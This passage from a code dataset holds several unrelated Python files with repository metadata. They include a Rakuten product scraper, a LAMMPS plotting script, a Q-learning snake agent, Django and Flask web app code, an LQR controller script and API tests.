Rakuten(VendorBase):\n vendor_name = \"rakuten\"\n \n def __init__(self):\n self.conf = choice(settings.RAKUTEN_KEYS)\n \n def _search(self, keyword):\n qs = urllib.urlencode({\n \"format\": \"json\",\n \"applicationId\": self.conf[\"applicationId\"],\n \"developerId\": self.conf[\"applicationId\"],\n \"affiliateId\": self.conf[\"affiliateId\"],\n \"keyword\": keyword.encode('utf8')\n })\n req = urllib.urlopen(RAKUTEN_ENDPOINT + \"?\" + qs)\n doc = json.load(req)\n \n if 'error' in doc:\n raise RuntimeError(doc['error'], doc['error_description'])\n \n return tuple(self.load_overview(i['Product']) for i in doc['Products'])\n \n def fetch_jan(self, url):\n if not url.startswith(\"http://product.rakuten.co.jp/\"):\n raise RuntimeError(\"Can not fetch jan from url: %s\" % url)\n \n request = urllib2.Request(url, headers={\n \"Referer\": \"http://product.rakuten.co.jp/\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36\"})\n response = urllib2.urlopen(request)\n \n parser = etree.HTMLParser()\n doc = etree.parse(response, parser)\n \n for node in doc.xpath(\"//div[@class='quickInfo']\"):\n text = \"\".join(node.itertext())\n result = re.search(\"(JAN)((\\s)*(:)?(\\s)*)?(?P\\d+)\", text, re.IGNORECASE)\n if result:\n jan = result.groupdict().get('jan')\n if jan: return jan\n \n return ''\n \n def load_overview(self, r):\n return ProductOverview(self.vendor_name, r['productId'],\n r['productName'],\n url=r.get('productUrlPC'),\n currency='JPN',\n price=r.get('averagePrice') or r.get('minPrice') or r.get('salesMinPrice'),\n ean=\"\",\n release_date='',\n manufacturer=r.get('makerNameFormal'),\n weight=find_weight(r.get('ProductDetails')),\n size='',\n )", "repo_name": "yagami-cerberus/thief", "sub_path": "thief/vendors/rakuten.py", "file_name": "rakuten.py", "file_ext": "py", "file_size_in_byte": 2783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "base.VendorBase", "line_number": 32, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.settings.RAKUTEN_KEYS", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 36, "usage_type": "name"}, {"api_name": "urllib.urlencode", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 46, "usage_type": "call"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 58, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 61, "usage_type": "call"}, {"api_name": "lxml.etree.HTMLParser", "line_number": 63, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 63, "usage_type": "name"}, {"api_name": "lxml.etree.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 64, "usage_type": "name"}, {"api_name": "re.search", "line_number": 68, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "base.ProductOverview", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "15532015863", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\n\r\n####################################\r\nfile_name = 'dump.2500sc300b.lammpstrj'\r\nsys_atoms = 5548\r\nchain_length = 2500\r\nrod_length = 10\r\nradius = 15\r\n####################################\r\n\r\ndef get_data(file_name):\r\n with open(file_name, 'r') as f:\r\n data = f.readlines()\r\n data_mat = list(map(lambda x:x.split(), data[-sys_atoms:]))\r\n f.close()\r\n return np.array(data_mat, dtype = float)\r\n\r\ndef get_chain(data):\r\n chain = data[np.where(data_mat[:,1]==3.0)[0]]\r\n return chain[np.argsort(chain[:,0], axis=0)]\r\n\r\ndef split_chain(chain):\r\n new_chain = []\r\n for i in range(0, chain_length, rod_length):\r\n new_chain.append(chain[i:i+rod_length,:])\r\n return new_chain\r\n\r\ndef parse_mol(mol):\r\n _mol = mol[np.where(mol[:,2]>0)[0]]\r\n return _mol\r\n\r\ndef _isOnSmallSphere(mol, R=14):\r\n x = mol[:, 2]\r\n if x.max()>R or x.min()<-R:\r\n return True\r\n else:\r\n return False\r\n\r\nif __name__ == '__main__':\r\n data_mat = get_data(file_name)\r\n chain = get_chain(data_mat)\r\n new_chain = split_chain(chain)\r\n for mol in new_chain:\r\n _mol = parse_mol(mol)\r\n if len(_mol)==0:\r\n continue\r\n elif _isOnSmallSphere(_mol, R=radius):\r\n continue\r\n else:\r\n plt.plot(_mol[:,3], _mol[:,4], c='k', marker='o')\r\n plt.show()\r\n", "repo_name": "dotmet/pypolymer", "sub_path": "pypolymer/analyze/lammps/repository/plotaxis.py", "file_name": "plotaxis.py", "file_ext": "py", "file_size_in_byte": 1416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "17230051528", "text": "from collections import defaultdict\r\nimport numpy as np\r\nfrom snake_environment import SnakeEnv\r\n\r\n\r\ndef create_zeroes_array():\r\n return np.zeros(size_of_action_space)\r\n\r\nclass snakeAgent:\r\n\r\n\r\n def __init__(\r\n self,\r\n learning_rate: float,\r\n initial_epsilon: float,\r\n epsilon_decay: float,\r\n final_epsilon: float,\r\n discount_factor: float = 0.95,\r\n env: SnakeEnv = None\r\n ):\r\n \"\"\"Initialize a Reinforcement Learning agent with an empty dictionary\r\n of state-action values (q_values), a learning rate and an epsilon.\r\n\r\n Args:\r\n learning_rate: The learning rate\r\n initial_epsilon: The initial epsilon value\r\n epsilon_decay: The decay for epsilon\r\n final_epsilon: The final epsilon value\r\n discount_factor: The discount factor for computing the Q-value\r\n \"\"\"\r\n global size_of_action_space\r\n size_of_action_space = env.action_space.n\r\n\r\n self.q_values = defaultdict(create_zeroes_array)\r\n self.lr = learning_rate\r\n self.discount_factor = discount_factor\r\n self.epsilon = initial_epsilon\r\n self.epsilon_decay = epsilon_decay\r\n self.final_epsilon = final_epsilon\r\n self.training_error = []\r\n\r\n self._action_to_direction = {\r\n 'up': 0,\r\n 'down': 1,\r\n 'left': 2,\r\n 'right':3,\r\n }\r\n\r\n def get_action(self, obs, env, is_training = True):\r\n \"\"\"\r\n Returns the best action with probability (1 - epsilon)\r\n otherwise a random action with probability epsilon to ensure exploration.\r\n \"\"\"\r\n obs = (obs['quad_apple'], \r\n #obs['quad_c_of_m'], \r\n obs['surroundings'][0], obs['surroundings'][1], obs['surroundings'][2]\r\n ) \r\n if is_training:\r\n # with probability epsilon return a random action to explore the environment\r\n if np.random.random() < self.epsilon:\r\n return env.action_space.sample()\r\n # with probability (1 - epsilon) act greedily (exploit)\r\n else:\r\n return (np.argmax(self.q_values[obs]))\r\n else:\r\n return (np.argmax(self.q_values[obs]))\r\n\r\n def update(\r\n self,\r\n obs,\r\n action: int,\r\n reward: float,\r\n terminated: bool,\r\n next_obs,\r\n ):\r\n \"\"\"Updates the Q-value of an action.\"\"\"\r\n obs = (obs['quad_apple'], \r\n #obs['quad_c_of_m'], \r\n obs['surroundings'][0], obs['surroundings'][1], obs['surroundings'][2]\r\n )\r\n next_obs = (next_obs['quad_apple'], \r\n #next_obs['quad_c_of_m'], \r\n next_obs['surroundings'][0], next_obs['surroundings'][1], next_obs['surroundings'][2]\r\n )\r\n future_q_value = (not terminated) * np.max(self.q_values[next_obs])\r\n temporal_difference = (\r\n reward + self.discount_factor * future_q_value - self.q_values[obs][action]\r\n )\r\n self.q_values[obs][action] = (\r\n self.q_values[obs][action] + self.lr * temporal_difference\r\n )\r\n self.training_error.append(temporal_difference)\r\n\r\n def decay_epsilon(self):\r\n self.epsilon = max(self.final_epsilon, self.epsilon - self.epsilon_decay)\r\n", "repo_name": "Kuzcop/snake", "sub_path": "snake_agent.py", "file_name": "snake_agent.py", "file_ext": "py", "file_size_in_byte": 3421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "snake_environment.SnakeEnv", "line_number": 19, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "22858768857", "text": "import atexit\nimport os\n\nfrom flask import Flask\n\nfrom components import *\nfrom database import connectDatabase, disconnectDatabase\nfrom functions import log\nfrom routers import routers\n\ntry:\n try:\n # 读取设置文件\n config = readConfigFile()\n except FileNotFoundError as e:\n log('找不到配置文件,错误信息:')\n log(e)\n except IOError as e:\n log('配置文件读取失败,错误信息:')\n log(e)\n else:\n LISTEN_PORT = config['Server']['ListenPort']\n DATABASE_NAME = config['Database']['Name']\n DATABASE_ADDRESS = config['Database']['Address']\n DATABASE_PORT = config['Database']['Port']\n DATABASE_USERNAME = config['Database']['Username']\n DATABASE_PASSWORD = config['Database']['Password']\n NOTE_FILE_POSITION = config['File']['NoteFilePosition']\n\n # 连接数据库。如果连接失败直接退出程序\n try:\n connectDatabase(DATABASE_ADDRESS, DATABASE_PORT, DATABASE_NAME, DATABASE_USERNAME,\n DATABASE_PASSWORD)\n except IOError as e:\n log('数据库连接失败,错误信息:')\n log(e)\n else:\n try:\n # 创建存放笔记文件用的文件夹\n os.makedirs(NOTE_FILE_POSITION, 0o777, True)\n except IOError as e:\n log('笔记存储文件夹不存在且创建失败,错误信息:')\n log(e)\n else:\n # Flask 设置\n app = Flask(__name__, static_folder = 'static/build')\n app.secret_key = os.urandom(24)\n\n # 注册各个路由\n routers.registerRouters(app)\n\n # 在应用程序退出之前关闭数据库连接\n atexit.register(disconnectDatabase)\n\n if __name__ == '__main__':\n log('服务器运行在 {0} 端口上'.format(LISTEN_PORT))\n app.run(host = '0.0.0.0', port = LISTEN_PORT, debug = False)\n\nexcept Exception as e:\n log('未能捕获的错误,错误信息:')\n log(e)\n", "repo_name": "Soulike/Class-Note-Manager-Python", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2153, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "functions.log", "line_number": 16, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 17, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 19, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 20, "usage_type": "call"}, {"api_name": "database.connectDatabase", "line_number": 32, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 35, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 36, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 40, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 42, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 46, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 47, "usage_type": "call"}, {"api_name": "routers.routers.registerRouters", "line_number": 50, "usage_type": "call"}, {"api_name": "routers.routers", "line_number": 50, "usage_type": "name"}, {"api_name": "atexit.register", "line_number": 53, "usage_type": "call"}, {"api_name": "database.disconnectDatabase", "line_number": 53, "usage_type": "argument"}, {"api_name": "functions.log", "line_number": 56, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 60, "usage_type": "call"}, {"api_name": "functions.log", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "3461681959", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport scipy\nimport control\nfrom dtk.bicycle import benchmark_state_space_vs_speed, benchmark_matrices\n\n\ndef compute_whipple_lqr_gain(velocity):\n _, A, B = benchmark_state_space_vs_speed(*benchmark_matrices(), velocity)\n Q = np.diag([1e5, 1e3, 1e3, 1e2])\n R = np.eye(2)\n\n gains = [control.lqr(Ai, Bi, Q, R)[0] for Ai, Bi in zip(A, B)]\n return gains\n\n\nif __name__ == '__main__':\n import sys\n\n v_low = 0 # m/s\n if len(sys.argv) > 1:\n v_high = int(sys.argv[1])\n else:\n v_high = 1 # m/s\n\n velocities = [v_low, v_high]\n gains = compute_whipple_lqr_gain(velocities)\n\n for v, K in zip(velocities, gains):\n print('computed LQR controller feedback gain for v = {}'.format(v))\n K = -K\n for r in range(K.shape[0]):\n row = ', '.join(str(elem) for elem in K[r, :])\n if r != K.shape[0] - 1:\n row += ','\n print(row)\n print()\n", "repo_name": "oliverlee/phobos", "sub_path": "scripts/calculate_lqr_gain.py", "file_name": "calculate_lqr_gain.py", "file_ext": "py", "file_size_in_byte": 1001, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dtk.bicycle.benchmark_state_space_vs_speed", "line_number": 10, "usage_type": "call"}, {"api_name": "dtk.bicycle.benchmark_matrices", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 12, "usage_type": "call"}, {"api_name": "control.lqr", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "15557576177", "text": "import json\nimport traceback\nimport pandas as pd\npd.set_option('display.max_rows',500)\npd.set_option('display.max_columns',500)\npd.set_option('display.width',1000)\nimport requests\n\n__author__ = 'wangjian'\n\n# host = '127.0.0.1:5001'\nhost = '192.168.3.212:8080'\n\ndef conn_FromCode(body=None):\n try:\n headers = {\"Content-Type\": \"application/json\"}\n url = \"http://{}/api/fromCode\".format(host)\n response = requests.post(url, data=json.dumps(body), headers=headers).content.decode()\n response_json = json.loads(response)\n # print(response_json)\n if response_json[\"resultCode\"] == 0:\n if response_json.get('data'):\n df_data = pd.DataFrame(response_json['data'])\n columns_list = []\n field_list = body.get('field_list')\n if field_list:\n columns_list = ['code', 'name']\n columns_list.extend(field_list)\n df_data.columns = columns_list\n return df_data\n else:\n return 'no data exist.'\n else:\n return 'select error.'\n except Exception:\n print(traceback.format_exc())\n\n\nif __name__ == '__main__':\n from pprint import pprint\n\n # code_list = [\"600006.SH\"]\n # code_list = [\"000858.SZ\",\"600722.SH\",\"000895.SZ\",\"600006.SH\"]\n code_list = [\"000858.SZ\"]\n\n\n # table = 'QT_DailyQuote'\n # field_list = [\"TradingDay\", \"PrevClosePrice\", \"OpenPrice\", \"HighPrice\", \"LowPrice\"]\n\n # table = 'QT_Performance'\n # field_list = [\"TradingDay\", \"PrevClosePrice\", \"TurnoverVolume\", \"RangePCT\", \"ChangePCTRW\"]\n\n # table = 'QT_PerformanceData'\n # field_list = [\"MaxRisingUpDays\", \"AHPremiumRate50\", \"TradingDay\", \"HighestPrice\", \"HighestPriceTW\"]\n\n table = 'LC_DIndicesForValuation'\n field_list = [\"TradingDay\", \"PB\", \"PCFTTM\", \"PCFS\", \"PS\", \"PE\"]\n\n # table = 'LC_SHSZHSCHoldings'\n # field_list = [\"SHSZHSCode\", \"SecuAbbr\", \"SharesHolding\", \"Holdratio\", \"InsertTime\"]\n\n body = {\n \"table\": table,\n \"code_list\": code_list,\n # \"all_code\": True,\n \"field_list\": field_list,\n \"alterField\": \"TradingDay\",\n # \"alterField\": \"EndDate\",\n \"startDate\": \"2020-08-10\",\n \"endDate\": \"2020-08-12\"\n }\n\n data = conn_FromCode(body)\n print(data)\n pe_data = data['PE'].tolist()[-1]\n print(pe_data)\n\n\n\n\n\n", "repo_name": "296348304/ngwshare", "sub_path": "conn_test/conn_code.py", "file_name": "conn_code.py", "file_ext": "py", "file_size_in_byte": 2395, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.set_option", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 18, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "37251468661", "text": "import logging\n\nfrom urllib import quote, unquote\n\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.utils.translation import ugettext as _\n\nfrom astakos.im import settings\nimport astakos.im.messages as astakos_messages\n\nlogger = logging.getLogger(__name__)\n\n\nclass CookieHandler():\n def __init__(self, request, response=None):\n cookies = getattr(request, 'COOKIES', {})\n cookie = unquote(cookies.get(settings.COOKIE_NAME, ''))\n self.uuid, sep, self.auth_token = cookie.partition('|')\n self.request = request\n self.response = response\n\n @property\n def uuid(self):\n return getattr(self, 'uuid', '')\n\n @property\n def auth_token(self):\n return getattr(self, 'auth_token', '')\n\n @property\n def is_set(self):\n no_token = not self.auth_token\n return not no_token\n\n @property\n def is_valid(self):\n cookie_attribute = 'uuid' if not settings.TRANSLATE_UUIDS else 'username'\n return (self.uuid == getattr(self.user, cookie_attribute, '') and\n self.auth_token == getattr(self.user, 'auth_token', ''))\n\n @property\n def user(self):\n return getattr(self.request, 'user', AnonymousUser())\n\n def __set(self):\n if not self.response:\n raise ValueError(_(astakos_messages.NO_RESPONSE))\n user = self.user\n expire_fmt = user.auth_token_expires.strftime(\n '%a, %d-%b-%Y %H:%M:%S %Z')\n if settings.TRANSLATE_UUIDS:\n cookie_value = quote(user.username + '|' + user.auth_token)\n else:\n cookie_value = quote(user.uuid + '|' + user.auth_token)\n self.response.set_cookie(\n settings.COOKIE_NAME, value=cookie_value, expires=expire_fmt, path='/',\n domain=settings.COOKIE_DOMAIN, secure=settings.COOKIE_SECURE\n )\n msg = str(('Cookie [expiring %(auth_token_expires)s]',\n 'set for %(uuid)s')) % user.__dict__\n logger._log(settings.LOGGING_LEVEL, msg, [])\n\n def __delete(self):\n if not self.response:\n raise ValueError(_(astakos_messages.NO_RESPONSE))\n self.response.delete_cookie(\n settings.COOKIE_NAME, path='/', domain=settings.COOKIE_DOMAIN)\n msg = 'Cookie deleted for %(uuid)s' % self.__dict__\n logger._log(settings.LOGGING_LEVEL, msg, [])\n\n def fix(self, response=None):\n self.response = response or self.response\n try:\n if self.user.is_authenticated():\n if not self.is_set or not self.is_valid:\n self.__set()\n else:\n if self.is_set:\n self.__delete()\n except AttributeError:\n pass\n", "repo_name": "mpastyl/websocket-console", "sub_path": "synnefo/snf-astakos-app/astakos/im/cookie.py", "file_name": "cookie.py", "file_ext": "py", "file_size_in_byte": 2728, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 17, "usage_type": "call"}, {"api_name": "astakos.im.settings.COOKIE_NAME", "line_number": 17, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "astakos.im.settings.TRANSLATE_UUIDS", "line_number": 37, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 37, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AnonymousUser", "line_number": 43, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 47, "usage_type": "call"}, {"api_name": "astakos.im.messages.NO_RESPONSE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "astakos.im.messages", "line_number": 47, "usage_type": "name"}, {"api_name": "astakos.im.settings.TRANSLATE_UUIDS", "line_number": 51, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 51, "usage_type": "name"}, {"api_name": "urllib.quote", "line_number": 52, "usage_type": "call"}, {"api_name": "urllib.quote", "line_number": 54, "usage_type": "call"}, {"api_name": "astakos.im.settings.COOKIE_NAME", "line_number": 56, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 56, "usage_type": "name"}, {"api_name": "astakos.im.settings.COOKIE_DOMAIN", "line_number": 57, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 57, "usage_type": "name"}, {"api_name": "astakos.im.settings.COOKIE_SECURE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "astakos.im.settings.LOGGING_LEVEL", "line_number": 61, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 61, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 65, "usage_type": "call"}, {"api_name": "astakos.im.messages.NO_RESPONSE", "line_number": 65, "usage_type": "attribute"}, {"api_name": "astakos.im.messages", "line_number": 65, "usage_type": "name"}, {"api_name": "astakos.im.settings.COOKIE_NAME", "line_number": 67, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 67, "usage_type": "name"}, {"api_name": "astakos.im.settings.COOKIE_DOMAIN", "line_number": 67, "usage_type": "attribute"}, {"api_name": "astakos.im.settings.LOGGING_LEVEL", "line_number": 69, "usage_type": "attribute"}, {"api_name": "astakos.im.settings", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "14002928468", "text": "# !/usr/bin/env/ python\n# -*- coding: utf-8 -*-\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom test_weixin_web.test_weixin_op.basepage import BasePage\n\n\nclass ContactPage(BasePage):\n\n def clic_add_member(self):\n from test_weixin_web.test_weixin_op.add_member_page import AddMemberPage\n ele = (By.CSS_SELECTOR, \".ww_operationBar .js_add_member\")\n # 显示等待,等待元素是可点击状态\n # WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(ele))\n self.wait_for_click(ele, 10)\n # 解决点击无效问题;设置死循环多次点击,直到目标元素出现后,跳出死循环\n while True:\n self.find(*ele).click()\n element = self.finds(By.ID, \"username\")\n if len(element) > 0:\n break\n\n return AddMemberPage(self.driver)\n\n def get_member(self):\n time.sleep(1)\n eles = self.finds(By.CSS_SELECTOR, \".member_colRight_memberTable_td:nth-child(2)\")\n name_list = []\n for value in eles:\n # 获取元素属性title的值,存入list内\n print(value.get_attribute(\"title\"))\n name_list.append(value.get_attribute(\"title\"))\n\n return name_list\n", "repo_name": "jennymyy86/Python-practice-task", "sub_path": "python_pratice/test_weixin_web/test_weixin_op/contact_page.py", "file_name": "contact_page.py", "file_ext": "py", "file_size_in_byte": 1420, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "test_weixin_web.test_weixin_op.basepage.BasePage", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "test_weixin_web.test_weixin_op.add_member_page.AddMemberPage", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "39902240394", "text": "from django.contrib import admin\nfrom django.urls import path, include\n\nfrom rest_framework.routers import DefaultRouter\n\nfrom api.views import AnuncioViewSet,CategoriaViewSet,HabilidadViewSet,FacultadViewSet,PersonaViewSet,ConsumidorViewSet,SugerenciaViewSet,NoticiaViewSet,UserViewSet\n\nrouter = DefaultRouter()\nrouter.register(r'Anuncios',AnuncioViewSet)\nrouter.register(r'Categorias',CategoriaViewSet)\nrouter.register(r'Habilidades',HabilidadViewSet)\nrouter.register(r'Facultades',FacultadViewSet)\nrouter.register(r'Personas',PersonaViewSet)\nrouter.register(r'Consumidores',ConsumidorViewSet)\nrouter.register(r'Sugerencias',SugerenciaViewSet)\nrouter.register(r'Noticias',NoticiaViewSet)\nrouter.register(r'Usuarios',UserViewSet)\n\nurlpatterns = router.urls\n\nurlpatterns += [\n path('admin/', admin.site.urls),\n path(r'credenciales/',include('rest_auth.urls')),\n path(r'credenciales/registration',include('rest_auth.registration.urls')),\n]\n", "repo_name": "jose598/knoot.anywhere", "sub_path": "backend/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 8, "usage_type": "call"}, {"api_name": "api.views.AnuncioViewSet", "line_number": 9, "usage_type": "argument"}, {"api_name": "api.views.CategoriaViewSet", "line_number": 10, "usage_type": "argument"}, {"api_name": "api.views.HabilidadViewSet", "line_number": 11, "usage_type": "argument"}, {"api_name": "api.views.FacultadViewSet", "line_number": 12, "usage_type": "argument"}, {"api_name": "api.views.PersonaViewSet", "line_number": 13, "usage_type": "argument"}, {"api_name": "api.views.ConsumidorViewSet", "line_number": 14, "usage_type": "argument"}, {"api_name": "api.views.SugerenciaViewSet", "line_number": 15, "usage_type": "argument"}, {"api_name": "api.views.NoticiaViewSet", "line_number": 16, "usage_type": "argument"}, {"api_name": "api.views.UserViewSet", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "42347988329", "text": "from rest_framework.test import APITestCase\nfrom rest_framework.test import APIClient\nfrom model_mommy import mommy\nfrom collections import OrderedDict\n\n\nclass TestResponseOffer(APITestCase):\n\n def setUp(self):\n self.c = APIClient()\n\n def test_response_offer(self):\n user = mommy.make(\"accounts.user\")\n offer = mommy.make(\"rides.offer\", owner=user,\n status=\"Di\",\n _fill_optional=True)\n\n self.c.force_authenticate(user)\n\n data = {\n \"text\": \"Puedes llevarme?\"\n }\n\n response = self.c.post(\"/offers/{}/request/\".format(offer.id), data)\n self.assertEqual(response.status_code, 201, response.data)\n self.assertDictEqual.__self__.maxDiff = None\n\n def test_accept_response_offer(self):\n user = mommy.make(\"accounts.user\")\n offer = mommy.make(\"rides.offer\", owner=user,\n status=\"Di\",\n _fill_optional=True)\n request_post = mommy.make(\"rides.requestpost\", offer=offer,\n _fill_optional=True)\n\n self.c.force_authenticate(user)\n\n data = {\n \"request_id\": request_post.id\n }\n\n response = self.c.post(\"/my-offers/{}/accept-request/\".format(offer.id), data)\n self.assertEqual(response.status_code, 201, response.data)\n self.assertDictEqual.__self__.maxDiff = None\n\n", "repo_name": "richardbm/inteliruta-backend", "sub_path": "rides/tests/test_integration/test_response_offer.py", "file_name": "test_response_offer.py", "file_ext": "py", "file_size_in_byte": 1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.test.APITestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "rest_framework.test.APIClient", "line_number": 10, "usage_type": "call"}, {"api_name": "model_mommy.mommy.make", "line_number": 13, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 13, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 14, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 14, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 29, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 29, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 30, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 30, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 33, "usage_type": "call"}, {"api_name": "model_mommy.mommy", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "34961006228", "text": "import matplotlib.pyplot as plt; plt.rcdefaults()\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nobjects = ('driverRequest()', 'viewRideRequests()', 'choseRide()', 'rideRequest()', 'sendDriverEther()')\r\ny_pos = np.arange(len(objects))\r\nperformance = [0.04399,0.006146,0.004741,0.03912,0.007552]\r\n\r\nplt.bar(y_pos, performance, align='center', alpha=0.5, width = 0.8, 